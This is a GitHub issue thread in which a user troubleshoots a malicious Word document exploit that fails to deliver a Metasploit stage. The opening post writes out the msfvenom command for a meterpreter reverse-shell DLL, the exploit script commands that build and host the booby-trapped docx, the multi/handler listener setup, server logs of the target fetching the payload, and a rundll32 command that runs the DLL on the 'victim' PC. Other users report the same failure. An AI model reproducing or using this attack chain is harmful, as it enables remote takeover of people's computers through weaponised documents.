Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Metasploit not sending stage #14

Open
oflavioc opened this issue Oct 12, 2021 · 3 comments
Open

Metasploit not sending stage #14

oflavioc opened this issue Oct 12, 2021 · 3 comments

Comments

@oflavioc
Copy link

I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll

Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi

Shared the docx with my victim PC and set metasploit as listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444

Setup the server to trasmit other files: sudo python3 exploit.py host 80

File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:

xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -

But metasploit keeps os listening state, with no changes.

If I execute on victim's powershell the command: rundll32 print.dll, start
Metasploit set the stage successfuly and I can control the victim's PC, which indicates the dll is not the issue.

Any tips on how to troubleshoot?
@happyfoxice
Copy link

I'm observing the same thing where it works and doesn't work. Testing on Win10, I can see the inf is dropped in AppsData\Local\Temp and other times it's not. I see a consistent creation of a *.dat and *.tmp files. Sometimes closing the docx, rundll32 remains and msword.inf is locked until I kill rundll32.

@DungLeMTA
Copy link

DungLeMTA commented Apr 23, 2022
edited
Loading

Could we solve it ?
I also get the same problem

@ST0new
Copy link

ST0new commented Jul 9, 2022

遇到同样的问题,有解决方案吗

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@oflavioc @ST0new @DungLeMTA @happyfoxice